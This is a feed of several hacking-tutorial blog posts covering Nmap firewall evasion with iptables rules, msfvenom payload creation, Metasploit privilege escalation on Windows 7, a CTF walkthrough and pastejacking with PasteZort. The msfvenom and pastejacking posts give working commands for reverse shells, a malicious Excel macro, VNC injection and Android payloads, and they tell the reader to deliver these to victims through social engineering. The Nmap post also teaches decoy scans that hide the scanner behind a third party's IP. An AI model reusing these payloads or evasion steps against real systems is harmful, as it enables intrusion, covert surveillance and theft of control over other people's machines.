Following image of wireshark is use to describe network traffic generated while nmap TCP scan is running, here 1st stream indicates SYN packet which contain following information:

Total Length: 60 [data length excluding 14 bytes of Ethernet]

Time to live: 64 [it is maximum ttl of linux system in tcp communication]

Reject SYN Flag with IPTables

As we know there is strong fight between security researcher and attacker, to increase network security admin will  apply firewall filter which will now prevent 3 way handshak communication in network and resist attacker to perfrom TCP scan by rejecting SYN packet in network.              

Execute given below command in ubuntu to block SYN packet:  

iptables -I INPUT -p tcp –tcp-flags ALL SYN -j REJECT –reject-with tcp-reset

Iptable work as firewall in linux operating system and above iptable rule will reject SYN packet to prevent TCP scan.

Now when SYN packet has been reject by firewall in target network, then attacker will be unable to enumerate open port of target’s network even if services are activated.

Now when again we [attacker] have executed TCP scan then it found Port 22 is closed as shown in given image.

Bypass SYN Filter

When attacker fails to enumerate open port using tcp scan. Then there are some advance scaning methods used to bypass such type of firewall filter as given below :

FIN Scan

A FIN packet is used to terminate the TCP connection between source and destination port typically after the data transfer is complete. In the place of a SYN packet, Nmap start a FIN scan by sending FIN packet.  

Fin Scan only works on Linux machine and does not work on latest version of windows

nmap -sF -p 22 192.168.0.101

From given image you can observe the result that port 22 is open.

When you will capture network traffic for FIN packet, you can bear out “data length” is 40 and “TTL” will be less than 64 every time moreover there is no use of SYN packet to establish TCP communication with target machine.

NULL Scan

A Null Scan is a series of TCP packets which hold a sequence number of “zeros” (0000000) and since there are none flags set, the destination will not know how to reply the request. It will discard the packet and no reply will be sent, which indicate that port is open.

Null Scan are only workable in Linux machines and does not work on latest version of windows

nmap -sN -p 22 192.168.0.101

From given image you can observe the result that port 22 is open.

 

Similarly When you will capture network traffic for NULL packet, you can bear out “data length” is 40 and “TTL” will be less than 64 every time, here also there is no use of SYN packet to establish TCP communication with target machine.

XMAS Scan

These scans are designed to manipulate the PSH, URG and FIN flags of the TCP header, Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. When source sent FIN, PUSH, and URG packet to specific port and if port is open then destination will discard the packets and will not sent any reply to source.

Xmas Scan are only workable in Linux machines and does not work on latest version of windows

nmap -sX -p 22 192.168.0.101

From given image you can observe the result that port 22 is open.

Similarly When you will capture network traffic for xmas scan you will get combination of FIN, PSH and URG flags, here also you can bear out “data length” is 40 and “TTL” will be less than 64 every time.

Conclusion: TCP connection established by 3 way handshak and if firewall discard 3 way handshak to prevent TCP communication then FIN, NULL and XMAS scan are used forTCP connection.  

Reject  FIN Packet Using IPTABLES Rule

Again admin add a new firewall filter to Prevent Netwok enumration from Fin scan which will reject FIN packet in network.

Execute given below command in ubuntu to block FIN packet:

iptables -I INPUT -p tcp –tcp-flags ALL FIN -j REJECT –reject-with tcp-reset

Now when attacker will try to perfrom advancet scan through FIN scan then he will not able to enumerate open port information which you can confirm from given below image.

At present only Null and Xmas will helpful to perfrom port enumeration untill unless admin has not block traffic coming from these scan. From given below image you can confirm that port 22 is close when Fin scan is perfromed while open when Null and Xmas is perfromed.

To prevent you network from NULL and Xmas scan too, apply given below iptables rule for Null and Xmas respectively:

iptables -I INPUT -p tcp –tcp-flags ALL NONE -j REJECT –reject-with tcp-reset

iptables -I INPUT -p tcp –tcp-flags ALL FIN,PSH,URG -j REJECT –reject-with tcp-reset

Reject  Data-length with IPTables

As I had discussed above TCP communication based upon 3 factors i.e. “Flag” which I had demonstrated above, “TTL” which I will demonstrate later and “Data length” which I am going to demonstrate.     

So now when admin wants secure again his network from TCP scan, instead of applying firewall filter on TCP-flags he can also apply firewall rule to check “data length” of specific size and then stop the incoming network traffic for TCP connection. Execute given below command to apply firewall rule on “data length”; by default 60 is data length use for TCP scan which you can confirm from table given above.

iptables -I INPUT -p tcp -m length –length 60 -j REJECT –reject-with tcp-reset

Now when data length of 60 bytes has been block by firewall in target network then attacker will be unable to enumerate open port of target even if service is activated.

Now when again we [attacker] had executed TCP scan then it has found Port 22 is closed as shown in given image.

Bypass Data-Length Restriction with Stealth Scan

When attacker fail to enumerate open port using TCP [sT] scan then there are some scanning method used to bypass such type of firewall filter as given below:

nmap -sS -p 22 192.168.0.101

From given below image you can observe port 22 is open when stealth scan[sS] is executed, this is because the data length send by stealth scan is 44 by default for TCP connection.

Stealth scan is much similar to TCP scan and also known as “half open” scanning because it send SYN packet and as response receives SYN/ACK packet from listening port and dump result without sending ACK packet to listening port. Therefore if “SYN packet” is block by firewall this scan gets failed, this scan is only applicable in case of data length = 60 is block or TTL = 64 is block by firewall.

Fragment Scan

The -f option causes the requested scan to use tiny fragmented IP packets. The idea is to split up the TCP header over several packets to make it harder for packet filters, intrusion detection systems, and other annoyances to detect what you are doing. So a 20-byte TCP header would be split into three packets, two with eight bytes of the TCP header, and one with the final four.

nmap -f -p22 192.168.0.101

When you will capture network traffic, you can bear out “data length” is 28 excluding 14 bytes of Ethernet and “TTL” will be less than 64 every time.

Similarly you use Fin, Null and Xmas scan whose data length is 40 to enumerate open port of target network.

If admin will apply firewall filter to reject data length 40,44 and 60 then it will not allow attacker to perform above all scan either basic scan or advance scan by executing following iptables rules.

iptables -I INPUT -p tcp -m length –length 60 -j REJECT –reject-with tcp-reset

iptables -I INPUT -p tcp -m length –length 44 -j REJECT –reject-with tcp-reset

iptables -I INPUT -p tcp -m length –length 40 -j REJECT –reject-with tcp-reset

From given below image you can observe now Fin, null, Xmas and sleath scan are some examples which were unable to enumerate open port of target netwok. All are showning port is close even if service is activated.

Data Length Scan

When attacker is unable to enumerate open port by applying above scan then he should go with nmap “data-length scan” which will bypass above firewall filter too.

By default nmap scan has fix data length as explain above, this scan let you append the random data length of your choice.

Using following command attacker is trying enumerate open port by defining data length 12

nmap —data-length 12 -p 22 192.168.0.101

Awesome!! From given below image you can observe port 22 is open.

So when you will use wireshark to capture network traffic generated while this scan has been executed you will get “Total length” for Tcp is 44.

Size of SSH packet is 70 bytes; now reduce 14 bytes from its of Ethernet then remains 56 byte; now reduce 12 bytes of data length which you have define at last total length will 44 bytes left.

Here, 70 bytes -14 bytes[Ethernet] = 56 bytes

Now, 56 bytes -12 bytes[data-length] = 44 bytes

Reject Length size 1 to 100

If admin is aware from nmap data-length scan then he should block a complete range of data length to prevent network scanning from attacker by executing following iptable rule.

iptables -I INPUT -p tcp -m length –length 1:100 -j REJECT –reject-with tcp-reset

Now firewall will analysis traffic coming on its network then reject the packet which contains data-length from 1 byte to 100 bytes and deny to establish TCP connections with attacker. 

Now if attacker sends data-length between 1 byte to 100 bytes the port scanning gets failed to enumerate its open state which you can confirm from given below image when data length 12 bytes and 10 bytes is sent in both scan, port 22 is closed. As soon as attacker sent data-length of 101 bytes which is more than 100 bytes, port 22 gets open.

TTL Scan

Reject TTL size with IPTables

After applying firewall filter on “TCP flags” and “data length” to secure network from enumeration now add firewall filter for “Time To Live” i.e. TTL.

If you had notice the table given in beginning of article you will observe that only TCP Scan [sT] has TTL value equal to 64 else remaining scan has TTL value less than 64 every time, hence if admin applies firewall filter to reject TTL value 64 then it will prevent network from TCP scanning.  

Given below command will add a new firewall rule to check TTL value of 64 and reject the packet.

iptables -I INPUT -p tcp -m ttl –ttl 64 -j REJECT –reject-with tcp-reset

Now if attacker use “TCP [sT] scan” to enumerate port information, it will always show “port is closed”, else if other scan is perfromed the attacker will get accurate information related to port state. From given below image you can observe when “basic scan is execute” to enumerate port details it give “port 22 is open”.

This happen because the TTL value for “basic scan” is less than 64 and firewall of target machine will reject only TTL value equal to 64. When we had captured network traffic generated while this scan has been executed then we found TTL value is 56 used in basic scan.

Now admin has added one more step of security to prevent his network from entire type scanning by rejecting TTL value of 64 and less than 64.

iptables -I INPUT -p tcp -m ttl –ttl-lt 64 -j REJECT –reject-with tcp-reset

Now firewall will analysis the traffic coming on his network and blocks the packet contains TTL 64 or less than it.

Bravo!! Above firewall rule is more powerful than the previous rules because it has complete block NMAP “basic scan” as well as “advance scan”, if you notice given below image then you will observe that TCP [sT], Fin Scan [sF], Data-length, Sealth [sS] Scan all have been failed and showing port is closed.

Still there is second way to enumerate port for accurate result, by setting TTL value grather than 64. Following command will perform port scan with defined TTL value i.e. 65 which will bypass firewall filter as 65 is greater than 64.

nmap -p22 –ttl 65 192.168.0.101

So if attacker is lucky to guess rejected TTL value or firewall rule and applied correct TTL ,then only port enumeration will get successful as shown in given image port 22 is open.

Source Port Scan

Source Port Filter with IPTables

One more step to secure network from scanning is to apply firewall rule to allow traffic from a specific port only and reject traffic from remaining ports.

iptables -I INPUT -p tcp –sport 80 -j  ACCEPT

iptables -A INPUT -p tcp -j  REJECT –reject-with tcp-reset

Now again NMAP basic and advance will fail to enumerate open port state and if attacker made correct gusses again firewall filter then he can excute NMAP source port scan to enumerate port details.

The option g is used to define source port which will carry network packet to destination port.

nmap -g 80 192.168.0.101

Above command will send traffic from port 80 to perfrom scanning hence firewall will allow traffic from source port 80 and as result show state for open ports.

Decoy Scan

Set Firewall Log to capture Attacker IP

Admin can set firewall rule to create Log for IP from which traffic is coming, it will only create system logs to capture the attacker IP who is performing scanning.

iptables -I INPUT -p tcp -j LOG –log-prefix “kaliNmap” –log-level=4

Now if attacker will perform any type network scanning on targeted system then firewall will generate its log which will capture his IP.

Escape from Firewall log

Always use some kind of precaution to escape yourself while performing network scanning because in windows “honey pot” and in Linux “iptables” are firewall will make log of attacker’s IP. In such situation you are suggested to use Decoy Scan for port enumeration.

Decoy Scan

The -D option makes it look like trick scanning the target network. It does not hide your own IP, but it makes your IP one of a torrent of others supposedly scanning the victim at the same time. This not only makes the scan look scarier, but reduces the chance of you being trace from your scan (difficult to tell which system is the “real” source).

nmap -D 216.58.203.164 192.168.0.101

In above command we had use Google IP as a torrent which will reflect as attacker IP in firewall log.

tail -f /var/log/syslog

When admin will read system log then he will take higlighted IP as attacker’s IP and may apply filter on this IP to block incoming traffic from it.

The post Understanding Guide to Nmap Firewall Scan (Part 1) appeared first on Hacking Articles.

Categories: Cyber India

Msfvenom Tutorials for Beginners

Fri, 17/Nov/2017 - 16:02

Hello friends!!

Today we will learn to create payloads from a popular tool known as metasploit, we will explore various option available within the tool to create payloads with different extensions and techniques.

Msfvenom

Msfvenom is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit.

Requirements:

  • Kali Linux
  • Windows Machine
  • Android Phone
  • Linux Machine

Abbreviations:

Lhost= (IP of Kali)

Lport= (any port you wish to assign to the listener)

P= (Payload I.e. Windows, android, PHP etc.)

F= file extension (i.e. windows=exe, android=apk etc.)

Let’s Begin!!

From the Kali terminal type command msfvenom as shown below. It will show you all available options for creating a payload but in this article we are talking about different types of payload we can generate.

Bind shell

A bind shell is the kind that opens up a new service on the target machine, and requires the attacker to connect to it in order to get a session

Now type the below “command” on your kali terminal

msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe

It will save the “exe” payload file on your desktop as specified on the command /root/Desktop/bind.exe We need to send this file to the victim machine through file share or by any social engineering technique and have it run on the system

Now let us start msfconsole and type below command to get session of victim machine

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/bind_tcp

msf exploit(handler) > set rhost IP 192.168.0.100

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

Once the file is executed on the machine we will get the victim machine meterpreter session as show below:

The bind_tcp option is helpful in case we get disconnected from victim machine while it is still running, we can execute the same command and get back the session without any intervention of the victim to run the exploit again.

Reverse TCP Payload

A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.

From the Kali terminal type command msfvenom as shown below:

Now type command

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > / root/Desktop/reverse_tcp.exe.

In this case we will include few other options such as lhost (local host) and lport (local port) to get a reverse connection from the victim machine

Once the payload is generated and send to the victim for execution, we will start our next step as shown below

Now let us start msfconsole and type below command to get session of victim machine

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost IP 192.168.0.107

msf exploit(handler) > set lport 5555

msf exploit(handler) > exploit

We can confirm from the image below, once the payload is executed by the victim, we received a reverse connection and got the meterpreter session successfully.

HTTPS Payload

Note: Both the above payloads can be used in case we have relevant ports active on the victim machine, so the question arises what if the victim has blocked all the ports?

Well in such cases we can create payloads as per the ports running on victim machine such as 443 for https:

Let’s us use this case and create a payload with https   From the Kali terminal type command msfvenom as shown below:

Now type command

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.107 lport=443 -f exe > /root/Desktop/443.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below

Now let us start msfconsole and type below command to get session of victim machine

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_https

msf exploit(handler) > set lhost IP 192.168.0.107

msf exploit(handler) > set lport 443

msf exploit(handler) > exploit

We can confirm from the above image, once the payload is executed by the victim, we received a reverse connection and got the meterpreter session.

Hidden Bind TCP Payload

Let us now explore some other technique available in msfvenom Tool and try to exploit the victim machine, this time we will get the shell of the victim machine instead of meterpreter session

Let’s begin!!

This payload hides on the background silently, while executed and does not reveal its presence if scanned by any port scanner.

From the Kali terminal type command msfvenom as shown below:

msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=1010 -f exe > /root/Desktop/hidden.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below.

We use Netcat to setup our listener.

Now from the kali Terminal let us type the command as shown above

nc 192.168.0.100 1010

Reverse Shell Payload with Netcat

Let us now do the same process and use shell_reverse_tcp payload, one more technique to get shell session of the victim

From the Kali terminal type command msfvenom as shown below:

msfvenom -p windows/shell_reverse_tcp ahost=192.168.0.107 lport=1111-f exe > /root/Desktop/ncshell.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below

We setup our listener using netcat, the image below confirms the shell session capture by the kali machine.

Now from the kali Terminal let us type the command as shown below.

nc -lvp 1111

Macro Payload

Let us now create a payload with a Vba script, which we will use to create a macro on Excel to exploit victim machine.

Let us begin to create the payload!!

Open Kali Terminal and type command as mention below:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=7777 -f vba

once the command is executed copy the script starting from “#if vba 7 till “End if” as highlighted in below image:

Let us now open an excel file and press alt+F11 key to open VB script, you will get the option box as shown above, enter the name you will like to provide and click on “create”.

You will get a new option box as above, click on “This workbook” and replace the values with your copied vb script payload generated by msfvenom tool and close the vb script editor and enable the macro.

Now you may draft your excel file with relevant data which may look realistic for an victim to open the file, in our case we have just inserted the value “Test”  save the file and send it to the victim.

To capture the sessions let us now start the multi handler as stated below:

Open kali Terminal and type msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set paylaod windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost=192.168.0.107

msf exploit(handler) > set lport= 7777

msf exploit(handler) > exploit

Once the excel file is opened by the victim, it will prompt the victim to enable the macro, once enabled, our vbscript will get executed to provide us with reverse connection to the victim machine as show in the below image.

VNC Payload

Will it not be great if we can take the remote of victim machine without their knowledge and observe their activity anonymously,  this payload does exactly that , let us use it to our benefit.

Let us begin to create the payload!! Open Kali Terminal and type command as mention below:

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.0.107 lport=5900 -f exe > /root/Desktop/vnc.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below. To capture the sessions let us now start the multi handler as stated below:

Open kali Terminal and type msfconsole

msf exploit(handler) > use exploit/multi/handler

msf exploit(handler) > set paylaod windows/vncinject/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport= 5900

msf exploit(handler) > exploit

We can see that reverse connection has executed the VNC injection and the victim remote machine session is established on our kali machine showing Remote Desktop.

Android Payload

Exploiting handheld devices have always been as hot topic and still continues, hence we have included it in our article as well, let us use one of the android exploit available within the msfvenom tool and use it to our benefit.

Let’s begin

Open Kali Terminal and type command as mention below:

msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8888 > /root/Desktop/file.apk

Once the payload gets generated send it to the victim to execute on his handheld, and start multi handler as shown in below image.

msf > use exploit/multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 8888

msf exploit(handler) > exploit

Once the payload gets executed, you will get the meterpreter session of the handheld, which is now in your control as shown below.

Linux Payload

Open Kali Terminal and type command as mention below:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f elf > /root/Desktop/shell

Once the payload gets generated send it to the victim to execute on his Linux machine and start multi handler as shown in below image.

msf > use exploit/multi/handler

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lhost 4444

msf exploit(handler) > run

Once the payload gets executed, it will create a reverse tcp connection on our kali machine providing us with meterpreter sessions, as shown on the image below.

Powershell Payload

Open Kali Terminal and type command as mention below:

msfvenom -p cmd/windows/reverse_powershell  lhost=192.168.0.107 lport=4444 > /root/Desktop/shell.bat

Once the payload gets generated send it to the victim to execute on his windows machine and start multi handler as shown in below image.

msf > use multi/handler

msf exploit(handler) > set payload cmd/windows/reverse_powershell

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

Once the payload gets executed, it will create a reverse connection to shell as shown in the image below.

Author: Krishnan Sharma is a technology professional having passion for information security and related fields, he loves technical writing and is part of our hacking article team, he may be contacted Here

The post Msfvenom Tutorials for Beginners appeared first on Hacking Articles.

Categories: Cyber India

7 Ways to Privilege Escalation of Windows 7 PC

Wed, 15/Nov/2017 - 21:01

When you exploit the victim pc there would be certain limits which resist performing some action even after you are having the shell of victim’s pc. To get complete access of your victim pc; you need to bypass privilege escalation where a user receives privileges they are not authorize to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. Metasploit has various other post exploits that will use a number of different techniques to attempt to gain system level privileges on the remote system.

 Requirement

Attacker: kali Linux

Victim PC: Windows 7 

 Open kali Linux terminal type msfconsole

Use payload for windows and start multi/handler for reverse connection. Once you hacked the victim pc now go for privilege escalation using following techniques

Windows Escalate UAC Protection Bypass

 Available targets: Windows x32 and Windows x64 bit

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.

msf > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set session 1

msf exploit(bypassuac) > exploit

 Give a look at image when you will use getuid command it ask for user ID that is username: pc 10; after using getsystem now username is system. Again use getuid command now you are having admin access.

Windows Escalate UAC Protection Bypass (In Memory Injection)

 Available targets: Windows x32 and Windows x64 bit

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call Exit Process () after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_injection

msf exploit(bypassuac_injection) > set session 1

msf exploit(bypassuac_injection) > exploit

 Use getsystem command and then go for user ID by typing getuid command in meterpreter.

Windows Escalate UAC Protection Bypass (Script Host Vulnerability)

 Available targets: Windows x32 and Windows x64 bit

This module will bypass Windows UAC by utilizing the missing .manifest on the script host cscript/wscript.exe binaries.

 msf > use windows/local/bypassuac_vbs

msf exploit(bypassuac_vbs) > set session 1

msf exploit(bypassuac_vbs) > exploit

 use getsystem command and then go for user ID by typing getuid command in meterpreter.

Windows Escalate UAC Execute RunAs

 Available targets: Windows x32 and Windows x64 bit

This module will attempt to elevate execution level using the Shell Execute undocumented Run As flag to bypass low UAC settings. Ask always uses a self-generated payload which is easily detected by AV. Click yes to allow the payload to create another reverse shell with elevated privileges.

msf > use windows/local/ask

msf exploit(ask) > set session 1

msf exploit(ask) > exploit

 Use getsystem command and then go for user ID by typing getuid command in meterpreter.

MS16-032 Secondary Logon Handle Privilege Escalation

Available targets: Windows x32 and Windows x64 bit

This module exploits the lack of sanitization of standard handles in Windows’ Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

msf > use windows/local/ms16_032_secondary_logon_handle_privesc

msf exploit(ms16_032_secondary_logon_handle_privesc) > set session 1

msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit

 Use getsystem command and then go for user ID by typing getuid command in meterpreter.

MS16-016 mrxdav.sys WebDav Local Privilege Escalation

 Available targets: Windows x32 bit

This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.

msf exploit(ms16_016_webdav) >set session 1

msf exploit(ms16_016_webdav) > exploit

Use getsystem command in meterpreter for admin access of pc.

Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

 Available targets: Windows 732 bit

This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shell code nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome’s sandbox. NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.

msf exploit(ms13_053_schlamperei) >set session 1

msf exploit(ms13_053_schlamperei) >exploit

 Use getsystem command and then go for user ID by typing getuid command in meterpreter

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post 7 Ways to Privilege Escalation of Windows 7 PC appeared first on Hacking Articles.

Categories: Cyber India

Hack the Covfefe VM (CTF Challenge)

Wed, 15/Nov/2017 - 14:10

Hello friends! Today we are going to take another CTF challenge known as covfefe. The credit for making this vm machine goes to “Tim Kent” and it is another capture the flag challenge in which our goal is to find 3 flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.120 but you will have to find your own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.120

Nmap scan shows us port port 31337 is running http, so we open the ip address on port 31337 in our browser.

 

We don’t find anything on the web page. So we use dirb to find the directories for more information.

dirb http://192.168.1.120:31337

We open robots.txt and find a directory called /taxes.

When we open /taxes directory we find our 1st flag.

Now our dirb scan showed us a few directories. Inside the /.ssh directory we find ssh keys and authorized_keys.

We download the private key and authorized_keys in our system for further enumeration.

Now we open authorized keys to check the username for the private key. We find it to be Simon.

Now we use the private key to connect to the VM through ssh.

chmod 600 id_rsa

ssh -i id_rsa simon@192.168.1.120

When we try to enter it ask for passphrase of rsa key. So we use john the ripper to crack the password we use rockyou.txt to as our dictionary.

ssh2john id_rsa > rsacrack

zcat /usr/share/wordlists/rockyou.txt.gz | john –pipe –rules rsacrack

We find that passphrase of the key is starwars. Now we use this passphrase along with the key to connect through ssh.

Now going through the files, we search for the binaries with root permission.

find / -perm -4000 2>/dev/null

When we run the read_message it is a program that takes the user input and displays a message.

Now when we enter the /root/ folder we find the source code of the read_message program. Inside the source code we find the second flag.

Reading through the source code we find that, when we enter a string it checks the first 5 char of the string with Simon. If it matches it runs a program /usr/local/sbin/message. Now the input it is allocated the size 20 bytes. So we overflow the stack entering more than 20 bytes of data. We use the first 5 char to be ‘Simon’ followed by 15 ‘A’ and then ‘/bin/sh’ at the 21st byte.

As soon as we enter the string we spawn a shell as root now we can access flag.txt. when we open flag.txt we find our 3rd flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Covfefe VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

Exploiting Remote machine with Pastejacking

Tue, 14/Nov/2017 - 10:17

Pastejacking is a technique that takes over the clipboard of a machine, for instance, when we copy text from a website, that text can be riddled with malicious code that will execute when you paste that text. This is a very good way to achieve a Meterpreter session because of its simplicity. All that needs to be done is; copy some harmless words from the browser and paste them on the command prompt and that’s it, session!!

We are going to walk you through the process, using a tool called PasteZort

Here’s how it happens:

The first thing you’ll need to do is get the tool from Github.

To keep it simple, from you Kali terminal, navigate to the desktop using “cd Desktop”. Once you’re at “root@kali:~/Desktop#”, type “git clone https://github.com/Zetahack/PasteZort.git”. This will make a PasteZort folder on your desktop with the tool in it

Open the folder and you will see all the files you need to run this tool, the inside of the folder will look like the screenshot given below.

In order to execute the tool we first must change the permission of the “encode.rb” file. Right click on the “encode.rb” file and open its properties, under properties, go to the “Permissions” tab, check the box in front of “Execute” that says “Allow executing file as program”.

Navigate to the PasteZort folder from the Kali terminal, now execute the tool using “python ./PasteZOrt.py”. Your tool is now running.

Now we can get started making our pastejacking payload using the tools interphase. We will be making a windows payload, so in front of “Objectves:” type “1” to choose Windows as the targeted operating system.

After that, again choose option “1” under “Select Payload” to generate a windows reverse tcp shell. Enter your IP address in “LHOST” and the port number you want the exploit to communicate with in “LPORT

You will now get an option to enter the message you want displayed as the pastejacking text, for example: we have written “ping” and “http://www.hackingarticles.in”.

And that’s it, your payload is ready.

You will now be asked to if you would like to turn on Handler, type “Y” and press enter

Open a web browser on the victim machine and enter your IP in the address bar, the text you typed in the message section will appear, select the text and copy it.

Open command prompt on the victim machine, paste the copied text and press Enter.

Go back to the Kali terminal and you will see Handler starting the reverse tcp and that’s it, you’ve done it. You now have a Meterpreter session, plain and simple.

The beauty of this tool lies in its simplicity, it has a clean interphase with an intuitive workflow and can get effective results without any mess.  The message section makes it easy to make your payload look as harmless as possible. This also goes to show how easy it is to get hacked, so stay vigilant.

Have fun and stay ethical.

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

The post Exploiting Remote machine with Pastejacking appeared first on Hacking Articles.

Categories: Cyber India